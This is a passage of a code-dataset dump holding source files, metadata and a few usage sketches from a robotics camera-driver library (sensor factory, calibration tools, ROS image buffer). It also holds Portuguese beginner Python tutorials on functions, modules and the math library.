.colorized_phoxi_sensor import ColorizedPhoXiSensor\n from .phoxi_ros_sensor import PhoXiSensor\nexcept BaseException as E:\n PhoXiSensor = exceptions.closure(E)\n ColorizedPhoXiSensor = exceptions.closure(E)\n\n\nclass RgbdSensorFactory:\n \"\"\"Factory class for Rgbd camera sensors.\"\"\"\n\n @staticmethod\n def sensor(sensor_type, cfg):\n \"\"\"Creates a camera sensor of the specified type.\n\n Parameters\n ----------\n sensor_type : :obj:`str`\n the type of the sensor (real or virtual)\n cfg : :obj:`YamlConfig`\n dictionary of parameters for sensor initialization\n \"\"\"\n sensor_type = sensor_type.lower()\n if sensor_type == \"kinect2\":\n s = Kinect2Sensor(\n packet_pipeline_mode=cfg[\"pipeline_mode\"],\n device_num=cfg[\"device_num\"],\n frame=cfg[\"frame\"],\n )\n elif sensor_type == \"bridged_kinect2\":\n s = KinectSensorBridged(quality=cfg[\"quality\"], frame=cfg[\"frame\"])\n elif sensor_type == \"primesense\":\n flip_images = True\n if \"flip_images\" in cfg.keys():\n flip_images = cfg[\"flip_images\"]\n s = PrimesenseSensor(\n auto_white_balance=cfg[\"auto_white_balance\"],\n flip_images=flip_images,\n frame=cfg[\"frame\"],\n )\n elif sensor_type == \"virtual\":\n s = VirtualSensor(cfg[\"image_dir\"], frame=cfg[\"frame\"])\n elif sensor_type == \"tensor_dataset\":\n s = TensorDatasetVirtualSensor(\n cfg[\"dataset_dir\"], frame=cfg[\"frame\"]\n )\n elif sensor_type == \"primesense_ros\":\n s = PrimesenseSensor_ROS(frame=cfg[\"frame\"])\n elif sensor_type == \"ensenso\":\n s = EnsensoSensor(frame=cfg[\"frame\"])\n elif sensor_type == \"phoxi\":\n s = PhoXiSensor(\n frame=cfg[\"frame\"],\n device_name=cfg[\"device_name\"],\n size=cfg[\"size\"],\n )\n elif sensor_type == \"webcam\":\n s = WebcamSensor(frame=cfg[\"frame\"], device_id=cfg[\"device_id\"])\n elif sensor_type == \"colorized_phoxi\":\n s = ColorizedPhoXiSensor(\n frame=cfg[\"frame\"],\n phoxi_config=cfg[\"phoxi_config\"],\n webcam_config=cfg[\"webcam_config\"],\n calib_dir=cfg[\"calib_dir\"],\n )\n elif sensor_type == \"realsense\":\n s = RealSenseSensor(\n cam_id=cfg[\"cam_id\"],\n filter_depth=cfg[\"filter_depth\"],\n frame=cfg[\"frame\"],\n )\n else:\n raise ValueError(\n \"RGBD sensor type %s not supported\" % (sensor_type)\n )\n return s\n"
},
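A hedged sketch of driving the factory above from a plain config dict; the key names come from the branches shown in the record, and the device index 0 is illustrative:
from perception import RgbdSensorFactory

cfg = {"frame": "webcam", "device_id": 0}  # keys required by the 'webcam' branch
sensor = RgbdSensorFactory.sensor("webcam", cfg)
sensor.start()
frames = sensor.frames()  # return structure depends on the concrete driver
sensor.stop()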
{
"alpha_fraction": 0.5877483487129211,
"alphanum_fraction": 0.5877483487129211,
"avg_line_length": 18.483871459960938,
"blob_id": "761d92419ea328d3a11f6b19be7de223243c813a",
"content_id": "0d2ddc42c6c951b209f720a01057e6a84c796db6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 604,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 31,
"path": "/perception/camera_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAbstract class for Camera sensors.\nAuthor: Jeff Mahler\n\"\"\"\nfrom abc import ABCMeta, abstractmethod\n\n\nclass CameraSensor(object):\n \"\"\"Abstract base class for camera sensors.\"\"\"\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def start(self):\n \"\"\"Starts the sensor stream.\"\"\"\n pass\n\n @abstractmethod\n def stop(self):\n \"\"\"Stops the sensor stream.\"\"\"\n pass\n\n def reset(self):\n \"\"\"Restarts the sensor stream.\"\"\"\n self.stop()\n self.start()\n\n @abstractmethod\n def frames(self):\n \"\"\"Returns the latest set of frames.\"\"\"\n pass\n"
},
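An illustrative-only subclass showing the contract the abstract base above imposes (start/stop/frames are the required overrides; reset comes for free):
from perception.camera_sensor import CameraSensor

class DummySensor(CameraSensor):
    def start(self):
        self._running = True  # a real driver would open the device here

    def stop(self):
        self._running = False

    def frames(self):
        # a real driver returns (color, depth, ...) images here
        return None, None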
{
"alpha_fraction": 0.6031352877616882,
"alphanum_fraction": 0.6237623691558838,
"avg_line_length": 21.44444465637207,
"blob_id": "fa81b1409d4b27c3116831e5c6739da2af27a45a",
"content_id": "d7def39b073bcbde5c2e87fa5da68fa823c2380f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1212,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 54,
"path": "/tools/test_ensenso.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTests the ensenso.\nAuthor: Jeff Mahler\n\"\"\"\nimport logging\nimport sys\nimport time\n\nimport rospy\nfrom visualization import Visualizer2D as vis2d\nfrom visualization import Visualizer3D as vis3d\n\nfrom perception import RgbdSensorFactory\n\n\ndef main(args):\n # set logging\n logging.getLogger().setLevel(logging.INFO)\n rospy.init_node(\"ensenso_reader\", anonymous=True)\n\n num_frames = 10\n sensor = RgbdSensorFactory(\"ensenso\", cfg={\"frame\": \"ensenso\"})\n sensor.start()\n\n total_time = 0\n for i in range(num_frames):\n if i > 0:\n start_time = time.time()\n\n _, depth_im, _ = sensor.frames()\n\n if i > 0:\n total_time += time.time() - start_time\n print(\"Frame %d\" % (i))\n print(\"Avg FPS: %.5f\" % (float(i) / total_time))\n\n depth_im = sensor.median_depth_img(num_img=5)\n point_cloud = sensor.ir_intrinsics.deproject(depth_im)\n point_cloud.remove_zero_points()\n\n sensor.stop()\n\n vis2d.figure()\n vis2d.imshow(depth_im)\n vis2d.title(\"Ensenso - Raw\")\n vis2d.show()\n\n vis3d.figure()\n vis3d.points(point_cloud, random=True, subsample=10, scale=0.0025)\n vis3d.show()\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n"
},
{
"alpha_fraction": 0.7842586040496826,
"alphanum_fraction": 0.7969079613685608,
"avg_line_length": 128.4545440673828,
"blob_id": "5c986db624c81d88855c4a7cf144437e4288d548",
"content_id": "4d2f4f398fe98b05c757767bb81f8a141c901f06",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1423,
"license_type": "permissive",
"max_line_length": 501,
"num_lines": 11,
"path": "/README.md",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "## Berkeley Autolab Perception Module\n[](https://pypi.org/project/autolab-perception/) [](https://pypi.org/project/autolab-perception/) [](https://github.com/BerkeleyAutomation/perception/actions) [](https://github.com/psf/black)\n\nThis package provides a wide variety of useful tools for perception tasks.\nIt directly depends on the [Berkeley Autolab Core\nmodule](https://www.github.com/BerkeleyAutomation/autolab_core), so be sure to install\nthat first.\nView the install guide and API documentation for the perception module\n[here](https://BerkeleyAutomation.github.io/perception). Dependencies for each driver are not automatically installed, so please install ROS or camera-specific packages separately before using these wrappers.\n\nNOTE: As of May 4, 2021, this package no longer supports Python versions 3.5 or lower as these versions have reached EOL. In addition, many modules have been moved to `autolab_core` to reduce confusion. This repository now will contain sensor drivers and interfaces only. If you wish to use older Python versions or rely on the old modules, please use the 0.x.x series of tags."
},
{
"alpha_fraction": 0.43478259444236755,
"alphanum_fraction": 0.695652186870575,
"avg_line_length": 22,
"blob_id": "def8e9435ab86feb245c5ddfc8804d292284e7c7",
"content_id": "f0f78f4f001d39d7a697f79692374aa8507acab9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 1,
"path": "/perception/constants.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "LBS_TO_GRAMS = 453.592\n"
},
{
"alpha_fraction": 0.554395318031311,
"alphanum_fraction": 0.5624089241027832,
"avg_line_length": 35.44247817993164,
"blob_id": "3822ac1f4eec6d11de5e9ff62b753ac94fc216ba",
"content_id": "603270b2fa2dc062b2082a39c881ae99f5caed8e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4118,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 113,
"path": "/tools/register_webcam.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nScript to register webcam to a chessboard in the YuMi setup.\nAuthors: Matt Matl and Jeff Mahler\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport traceback\n\nimport cv2\nimport numpy as np\nfrom autolab_core import RigidTransform, YamlConfig\n\nfrom perception import RgbdSensorFactory\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n\n # parse args\n parser = argparse.ArgumentParser(\n description=\"Register a webcam to the robot\"\n )\n parser.add_argument(\n \"--config_filename\",\n type=str,\n default=\"cfg/tools/register_webcam.yaml\",\n help=\"filename of a YAML configuration for registration\",\n )\n args = parser.parse_args()\n config_filename = args.config_filename\n config = YamlConfig(config_filename)\n\n T_cb_world = RigidTransform.load(config[\"chessboard_tf\"])\n\n # Get camera sensor object\n for sensor_frame, sensor_data in config[\"sensors\"].iteritems():\n logging.info(\"Registering {}\".format(sensor_frame))\n sensor_config = sensor_data[\"sensor_config\"]\n reg_cfg = sensor_data[\"registration_config\"].copy()\n reg_cfg.update(config[\"chessboard_registration\"])\n\n try:\n # Open sensor\n sensor_type = sensor_config[\"type\"]\n sensor_config[\"frame\"] = sensor_frame\n logging.info(\"Creating sensor\")\n sensor = RgbdSensorFactory.sensor(sensor_type, sensor_config)\n logging.info(\"Starting sensor\")\n sensor.start()\n intrinsics = sensor.color_intrinsics\n logging.info(\"Sensor initialized\")\n\n # Register sensor\n resize_factor = reg_cfg[\"color_image_rescale_factor\"]\n nx, ny = reg_cfg[\"corners_x\"], reg_cfg[\"corners_y\"]\n sx, sy = reg_cfg[\"size_x\"], reg_cfg[\"size_y\"]\n\n img, _, _ = sensor.frames()\n resized_color_im = img.resize(resize_factor)\n corner_px = resized_color_im.find_chessboard(sx=nx, sy=ny)\n if corner_px is None:\n logging.error(\n \"No chessboard detected in sensor {}! \"\n \"Check camera exposure settings\".format(sensor_frame)\n )\n exit(1)\n webcam_corner_px = corner_px / resize_factor\n\n # Compute Camera Matrix for webcam\n objp = np.zeros((nx * ny, 3), np.float32)\n xstart = -sx * (nx / 2 - ((nx + 1) % 2) / 2.0)\n xend = sx * (nx / 2 - ((nx + 1) % 2) / 2.0 + 1)\n ystart = -sy * (ny / 2 - ((ny + 1) % 2) / 2.0)\n yend = sy * (ny / 2 - ((ny + 1) % 2) / 2.0 + 1)\n filler = np.mgrid[ystart:yend:sy, xstart:xend:sx]\n filler = filler.reshape(\n (filler.shape[0], filler.shape[1] * filler.shape[2])\n ).T\n objp[:, :2] = filler\n\n ret, rvec, tvec = cv2.solvePnP(\n objp, webcam_corner_px, intrinsics.K, None\n )\n mat, _ = cv2.Rodrigues(rvec)\n T_cb_cam = RigidTransform(\n mat, tvec, from_frame=\"cb\", to_frame=sensor_frame\n )\n T_cam_cb = T_cb_cam.inverse()\n T_camera_world = T_cb_world.dot(T_cam_cb)\n\n logging.info(\"Final Result for sensor %s\" % (sensor_frame))\n logging.info(\"Translation: \")\n logging.info(T_camera_world.translation)\n logging.info(\"Rotation: \")\n logging.info(T_camera_world.rotation)\n\n except Exception:\n logging.error(\"Failed to register sensor {}\".format(sensor_frame))\n traceback.print_exc()\n continue\n\n # save tranformation arrays based on setup\n output_dir = os.path.join(config[\"calib_dir\"], sensor_frame)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n pose_filename = os.path.join(\n output_dir, \"%s_to_world.tf\" % (sensor_frame)\n )\n T_camera_world.save(pose_filename)\n intr_filename = os.path.join(output_dir, \"%s.intr\" % (sensor_frame))\n intrinsics.save(intr_filename)\n\n sensor.stop()\n"
},
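The core of the script above is the frame composition T_camera_world = T_cb_world · T_cam_cb. A stripped-down sketch of just that step with autolab_core, using identity transforms in place of real calibration data:
import numpy as np
from autolab_core import RigidTransform

T_cb_world = RigidTransform(np.eye(3), np.zeros(3), from_frame="cb", to_frame="world")
T_cb_cam = RigidTransform(np.eye(3), np.zeros(3), from_frame="cb", to_frame="webcam")
T_camera_world = T_cb_world.dot(T_cb_cam.inverse())  # maps webcam frame -> world frame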
{
"alpha_fraction": 0.6073492169380188,
"alphanum_fraction": 0.6147446036338806,
"avg_line_length": 32.8046875,
"blob_id": "c7c9eb99e416bdea875d9ea411b5b09e1466f18a",
"content_id": "498746502cd4d2ffac665091aa529383eeac1696",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4327,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 128,
"path": "/ros_nodes/image_buffer.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\"\"\"\nROS node that buffers a ROS image stream and allows for\ngrabbing many images simultaneously.\n\"\"\"\nimport numpy as np\nimport rospy\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Image\n\ntry:\n from perception.srv import ImageBuffer, ImageBufferResponse\nexcept ImportError:\n raise RuntimeError(\"image_buffer unavailable outside of catkin package\")\n\n# TODO:\n# Timestamps\n# Giving a warning if stale data is being returned/delete stale data\n# Launchfile for launching image buffer and primesense camera\n\n# Modify ImageBuffer to work with numpy arrays\nImageBufferResponse = rospy.numpy_msg.numpy_msg(ImageBufferResponse)\nImageBuffer._response_class = ImageBufferResponse\n\nif __name__ == \"__main__\":\n # Initialize the node.\n rospy.init_node(\"stream_image_buffer\")\n\n # Args:\n # instream (string) ROS image stream to buffer\n # absolute (bool, optional) if True, current frame is not prepended\n # to instream (default False)\n # bufsize (int, optional) Maximum size of image buffer\n # (number of images stored) (default 100)\n # show_framerate (bool, optional) If True, logs number of frames received\n # in the last 10 seconds (default True)\n instream = rospy.get_param(\"~instream\")\n absolute = rospy.get_param(\"~absolute\", False)\n bufsize = rospy.get_param(\"~bufsize\", 100)\n show_framerate = rospy.get_param(\"~show_framerate\", True)\n\n stream_to_buffer = instream\n if not absolute:\n stream_to_buffer = rospy.get_namespace() + stream_to_buffer\n\n # Initialize the CvBridge and image buffer list,\n # as well as misc counting things\n bridge = CvBridge()\n buffer = []\n dtype = \"float32\"\n images_so_far = 0\n\n def callback(data):\n \"\"\"Callback function for subscribing to an\n Image topic and creating a buffer\"\"\"\n global dtype\n global images_so_far\n\n # Get cv image (which is a numpy array) from data\n cv_image = bridge.imgmsg_to_cv2(data)\n # Save dtype before we float32-ify it\n dtype = str(cv_image.dtype)\n # Insert and roll buffer\n buffer.insert(\n 0, (np.asarray(cv_image, dtype=\"float32\"), rospy.get_time())\n )\n if len(buffer) > bufsize:\n buffer.pop()\n\n # for showing framerate\n images_so_far += 1\n\n # Initialize subscriber with our callback\n rospy.Subscriber(stream_to_buffer, Image, callback)\n\n def handle_request(req):\n \"\"\"Request-handling for returning a bunch of images stuck together\"\"\"\n # Register time of request\n req_time = rospy.get_time()\n\n # Check if request fits in buffer\n if req.num_requested > len(buffer):\n raise RuntimeError(\n \"Number of images requested exceeds current buffer size\"\n )\n\n # Cut out the images and timestamps we're returning, save image shape\n ret_images, ret_times = zip(*buffer[: req.num_requested])\n image_shape = ret_images[0].shape\n images_per_frame = 1 if len(image_shape) == 2 else image_shape[2]\n\n # Get timestamps in desired mode\n if req.timing_mode == 0:\n ret_times = np.asarray(ret_times)\n elif req.timing_mode == 1:\n ret_times = np.asarray([req_time - time for time in ret_times])\n else:\n raise RuntimeError(\n \"{0} is not a value for timing_mode\".format(req.timing_mode)\n )\n\n # Stack and unravel images because ROS doesn't like\n # multidimensional arrays\n ret_images = np.dstack(ret_images)\n\n return ImageBufferResponse(\n ret_times,\n ret_images.ravel(),\n images_per_frame,\n dtype,\n *ret_images.shape\n )\n\n # Initialize service with our request handler\n s = rospy.Service(\"stream_image_buffer\", ImageBuffer, 
handle_request)\n\n if show_framerate:\n r = rospy.Rate(0.1)\n while not rospy.is_shutdown():\n rospy.loginfo(\n \"{0} frames recorded in the past 10 seconds from {1}\".format(\n images_so_far, stream_to_buffer\n )\n )\n images_so_far = 0\n r.sleep()\n else:\n rospy.spin()\n"
},
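A hypothetical client for the buffer node above; it assumes the node is running and that the ImageBuffer request carries (num_requested, timing_mode) fields, as the handler suggests:
import rospy
from perception.srv import ImageBuffer

rospy.init_node("image_buffer_client")
rospy.wait_for_service("stream_image_buffer")
grab = rospy.ServiceProxy("stream_image_buffer", ImageBuffer)
resp = grab(10, 0)  # last 10 buffered frames, absolute timestamps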
{
"alpha_fraction": 0.6011834144592285,
"alphanum_fraction": 0.6173570156097412,
"avg_line_length": 26.85714340209961,
"blob_id": "88069a1c817e3ecc34685f683495d4f3f6fcc04e",
"content_id": "a865b886abc84ce0700301304e8f52889004f119",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2535,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 91,
"path": "/tools/colorize_phoxi.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nScript to register a webcam to the Photoneo PhoXi\nAuthor: Matt Matl\n\"\"\"\nimport argparse\nimport logging\n\nimport rosgraph.roslogging as rl\nimport rospy\nfrom autolab_core import YamlConfig\nfrom visualization import Visualizer3D as vis3d\n\nfrom perception import RgbdSensorFactory\n\n\ndef main():\n logging.getLogger().setLevel(logging.INFO)\n\n # parse args\n parser = argparse.ArgumentParser(\n description=\"Register a webcam to the Photoneo PhoXi\"\n )\n parser.add_argument(\n \"--config_filename\",\n type=str,\n default=\"cfg/tools/colorize_phoxi.yaml\",\n help=\"filename of a YAML configuration for registration\",\n )\n args = parser.parse_args()\n config_filename = args.config_filename\n config = YamlConfig(config_filename)\n\n sensor_data = config[\"sensors\"]\n phoxi_config = sensor_data[\"phoxi\"]\n phoxi_config[\"frame\"] = \"phoxi\"\n\n # Initialize ROS node\n rospy.init_node(\"colorize_phoxi\", anonymous=True)\n logging.getLogger().addHandler(rl.RosStreamHandler())\n\n # Get PhoXi sensor set up\n phoxi = RgbdSensorFactory.sensor(phoxi_config[\"type\"], phoxi_config)\n phoxi.start()\n\n # Capture PhoXi and webcam images\n phoxi_color_im, phoxi_depth_im, _ = phoxi.frames()\n\n # vis2d.figure()\n # vis2d.subplot(121)\n # vis2d.imshow(phoxi_color_im)\n # vis2d.subplot(122)\n # vis2d.imshow(phoxi_depth_im)\n # vis2d.show()\n\n phoxi_pc = phoxi.ir_intrinsics.deproject(phoxi_depth_im)\n colors = (\n phoxi_color_im.data.reshape(\n (\n phoxi_color_im.shape[0] * phoxi_color_im.shape[1],\n phoxi_color_im.shape[2],\n )\n )\n / 255.0\n )\n vis3d.figure()\n vis3d.points(phoxi_pc.data.T[::3], color=colors[::3], scale=0.001)\n vis3d.show()\n\n # Export to PLY file\n vertices = phoxi.ir_intrinsics.deproject(phoxi_depth_im).data.T\n colors = phoxi_color_im.data.reshape(\n phoxi_color_im.data.shape[0] * phoxi_color_im.data.shape[1],\n phoxi_color_im.data.shape[2],\n )\n f = open(\"pcloud.ply\", \"w\")\n f.write(\n \"ply\\nformat ascii 1.0\\nelement vertex {}\\nproperty float x\\n\"\n \"property float y\\nproperty float z\\nproperty uchar red\\n\".format(\n len(vertices)\n )\n + \"property uchar green\\nproperty uchar blue\\nend_header\\n\"\n )\n for v, c in zip(vertices, colors):\n f.write(\n \"{} {} {} {} {} {}\\n\".format(v[0], v[1], v[2], c[0], c[1], c[2])\n )\n f.close()\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 9,
"blob_id": "4f83dde691c4a3f5540b1bb59a1b75f6ffcc5377",
"content_id": "6872f91172fb66cb796424fa5028562c8f8a5957",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 30,
"license_type": "permissive",
"max_line_length": 13,
"num_lines": 3,
"path": "/docs/gh_deploy.sh",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\nmake gh-pages\ncd ..\n"
},
{
"alpha_fraction": 0.6393442749977112,
"alphanum_fraction": 0.6393442749977112,
"avg_line_length": 14.913043022155762,
"blob_id": "c96a17c2cf0ebd79bfddda7226a9b098cc13815b",
"content_id": "2f9fb7402c1547afb2d7366c2248d0222711dc54",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 732,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 46,
"path": "/docs/source/api/image.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Image Classes\n=============\n\nImage\n~~~~~\n.. autoclass:: perception.Image\n\nColorImage\n~~~~~~~~~~\n.. autoclass:: perception.ColorImage\n\nDepthImage\n~~~~~~~~~~\n.. autoclass:: perception.DepthImage\n\nIrImage\n~~~~~~~\n.. autoclass:: perception.IrImage\n\nGrayscaleImage\n~~~~~~~~~~~~~~\n.. autoclass:: perception.IrImage\n\nBinaryImage\n~~~~~~~~~~~\n.. autoclass:: perception.BinaryImage\n\nSegmentationImage\n~~~~~~~~~~~~~~~~~\n.. autoclass:: perception.SegmentationImage\n\nPointCloudImage\n~~~~~~~~~~~~~~~\n.. autoclass:: perception.PointCloudImage\n\nNormalCloudImage\n~~~~~~~~~~~~~~~~\n.. autoclass:: perception.NormalCloudImage\n\nRenderMode\n~~~~~~~~~~\n.. autoclass:: perception.RenderMode\n\nObjectRender\n~~~~~~~~~~~~\n.. autoclass:: perception.ObjectRender\n"
}
] | 40 |
rogerio5ouza/python-beginner | https://github.com/rogerio5ouza/python-beginner | 0150281a9c98e289bb93f81489e9ff78b760fabc | f2b1cd8c37413f8db6141213aec165f65567248c | cc1455b3ac9053e7f2b5d03bc1cfc53116cb6963 | refs/heads/master | 2022-12-27T13:57:41.344799 | 2020-10-10T13:50:02 | 2020-10-10T13:50:02 | 257,658,246 | 0 | 0 | null | 2020-04-21T16:58:51 | 2020-10-10T13:42:39 | 2020-10-10T13:50:02 | Python |
[
{
"alpha_fraction": 0.689393937587738,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 21,
"blob_id": "16d7107bd5d6a2b257b2fe93cf577454c7e978da",
"content_id": "e4c07bbee3adebde7843e6b229329868db5f8521",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 6,
"path": "/semana-4/modules_7.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "# Exemplo\n# Importa apenas o dicionário 'pessoa_1' do módulo 'modules_6':\n\nfrom modules_6 import pessoa_1\n\nprint(pessoa_1['idade'])\n"
},
{
"alpha_fraction": 0.7342657446861267,
"alphanum_fraction": 0.7377622127532959,
"avg_line_length": 21,
"blob_id": "59ab62402b513d26f9ebb97024beadae56c79d32",
"content_id": "9e77508839f65d12245c14624c68abe6ce0461d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 290,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 13,
"path": "/semana-4/modules_3.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "import modules as mx\n\n'''\nNomeando um Módulo\n\nPodemos nomear o arquivo do módulo como quisermos, mas deve ter a extensão de arquivo .py.\n\nPodemos criar um alias ao importar um módulo, usando a keyword as.\n'''\n# Cria um alias para modules chamado mx:\n\na = mx.pessoa_1[\"cidade\"]\nprint(a)\n"
},
{
"alpha_fraction": 0.7307803630828857,
"alphanum_fraction": 0.7365825176239014,
"avg_line_length": 21.82781410217285,
"blob_id": "b45474ba052f2923d8d13a86d8170e51f5d3f247",
"content_id": "9e38514326e5fc167408abc1a17f7578d3e80790",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3533,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 151,
"path": "/semana-3/functions.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nFunctions\n\nUma função é um bloco de de código que só é executado quando é chamado.\nPodemos passar dados, conhecidos como parâmetros, para uma função.\nUma função pode retornar dados como resultado.\n'''\n# Exemplo:\n\n\ndef minha_function():\n print('Olá, da minha função!')\n\n\nminha_function()\n\n'''\nArguments (Argumentos)\n\nUma informação pode ser passada para uma função como argumento.\nArgumentos são definidos depois do nome da função, entre parênteses. Podemos adicionar quantos argumentos quisermos, basta apenas separá-los com uma vírgula.\n'''\n# Exemplo:\n\n\ndef nomeCompleto(nome):\n print(nome + ' Souza')\n\n\nnomeCompleto('Rogerio')\nnomeCompleto('Carol')\nnomeCompleto('Hermano')\n\n'''\nNumbers of Arguments (Números de argumentos)\n\nPor padrão, uma função deve ser chamada com o número correto de argumentos. Isso significa que, se uma função espera receber 2 argumentos, devemos chamar \na função com 2 argumentos, nem mais nem menos.\n'''\n# Exemplo:\n\n\ndef nomeCompleto_2(nome, sobrenome):\n print(nome + ' ' + sobrenome)\n\n\nnomeCompleto_2('Hermano', 'Souza')\n\n'''\nArbitrary Arguments, *args (Argumentos arbitrários)\n\nQuando não soubermos quantos argumentos serão passados para uma função, adicionamos um * antes do nome do parâmetro na definição da função.\nDessa forma, a função receberá uma tupla de argumentos e poderá acessar os itens de acordo.\n'''\n# Exemplo:\n\n\ndef func_tipos_transporte(*transporte):\n print('Meu transporte preferido é' + transporte[2])\n\n\nfunc_tipos_transporte('Aquatico', 'Aereo', 'Terrestre')\n\n# Se o número de argumentos da keyword for desconhecido, adicionamos um duplo ** antes do nome do parâmetro:\n\n\ndef func_tipos_transporte_2(**transporte):\n print('Meu transporte preferido é' + transporte['terrestre'])\n\n\nfunc_tipos_transporte_2(aquatico='barco', aereo='aviao', terrestre='bicicleta')\n\n'''\nKeyword Arguments (Argumentos de palavras-chave)\n\nPodemos ainda passar argumentos com a sintaxe: key = valeu.\nDessa forma a ordem dos arguentos não importa.\n'''\n# Exemplo:\n\n\ndef meusFilhos(filho3, filho2, filho1):\n print('O caçula é o ' + filho3)\n\n\nmeusFilhos(filho1='José', filho2='Tomas', filho3='Torvalds')\n\n'''\nDefault Parameter Value (Valor padrão do parâmetro)\n\nSe chamarmos uma função sem argumento, ela usará um valor padrão.\n'''\n# Exemplo:\n\n\ndef func_nacionalidade(pais='Brasil'):\n print('Eu sou do (a) ' + pais)\n\n\nfunc_nacionalidade('Dinamarca')\nfunc_nacionalidade('India')\nfunc_nacionalidade()\nfunc_nacionalidade('Grecia')\n\n'''\nPassing a List as an Argument (Passando uma lista como argumento)\n\nPodemos enviar qualquer tipo de argumento de dados para uma função (string, número, lista, dicionário, etc...) 
que será tratado com o mesmo tipo\nde dados dentro da função.\n\nPodemos enviar uma lista como argumento, que ainda será uma lista quando atingir a função.\n'''\n# Exemplo:\n\n\ndef func_comida(food):\n for x in food:\n print(x)\n\n\nfrutas = ['banana', 'manga', 'laranja']\n\nfunc_comida(frutas)\n\n'''\nReturn Values (Retornar valores)\n\nPara permitir que uma função retorne um valor, usamos o comando return.\n'''\n# Exemplo:\n\n\ndef func_multiplica(x):\n return 10 * x\n\n\nprint(func_multiplica(2))\nprint(func_multiplica(5))\nprint(func_multiplica(10))\n\n'''\nThe pass Statement (A declaração pass)\n\nAs definições de uma função não podem estar vazias, mas se, por algum motivo, \ntivermos uma função sem conteúdo, inserimos a instrução pass para evitar erros.\n'''\n# Exemplos:\n\n\ndef minha_func():\n pass\n"
},
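One pattern the functions tutorial above stops short of: returning several values at once (they come back packed in a tuple). A small, self-contained sketch:
def min_and_max(values):
    # two results from one function call, returned as a tuple
    return min(values), max(values)

lowest, highest = min_and_max([4, 1, 9, 7])
print(lowest, highest)  # 1 9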
{
"alpha_fraction": 0.7313054203987122,
"alphanum_fraction": 0.7427123188972473,
"avg_line_length": 22.205883026123047,
"blob_id": "90bcc007bb9420fbbb923426ad8c06b98579066b",
"content_id": "e83a4b02dce9c01c9b1702c789d14bc4b8533c29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 807,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 34,
"path": "/semana-4/math_2.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nO módulo Math\n\nPython possui um módulo integrado chamado Math, que estende uma lista de funções matemáticas.\n\nPara usá-lo, devemos importá-lo.\n\nDepois de importá-lo, podemos começar a usar os métodos e constantes.\n'''\n\n# O método math.sqrt() retorna a raiz quadrada de um número:\n\nimport math\n\nnumero_quadrado = math.sqrt(49)\nprint(numero_quadrado)\n\n'''\nO método math.ceil() arredonda um número para cima, para seu inteiro mais próximo, e o método math.floor() \narredonda um número para baixo, para seu inteiro mais próximo e retorna o resultado.\n'''\n# Exemplo:\n\narredonda_pra_cima = math.ceil(1.4)\narredonda_pra_baixo = math.floor(1.4)\n\nprint(arredonda_pra_cima)\nprint(arredonda_pra_baixo)\n\n# A constante math.pi retorna o valor de PI(3,14...):\n\nnumero_pi = math.pi\n\nprint(numero_pi)\n"
},
{
"alpha_fraction": 0.5315638184547424,
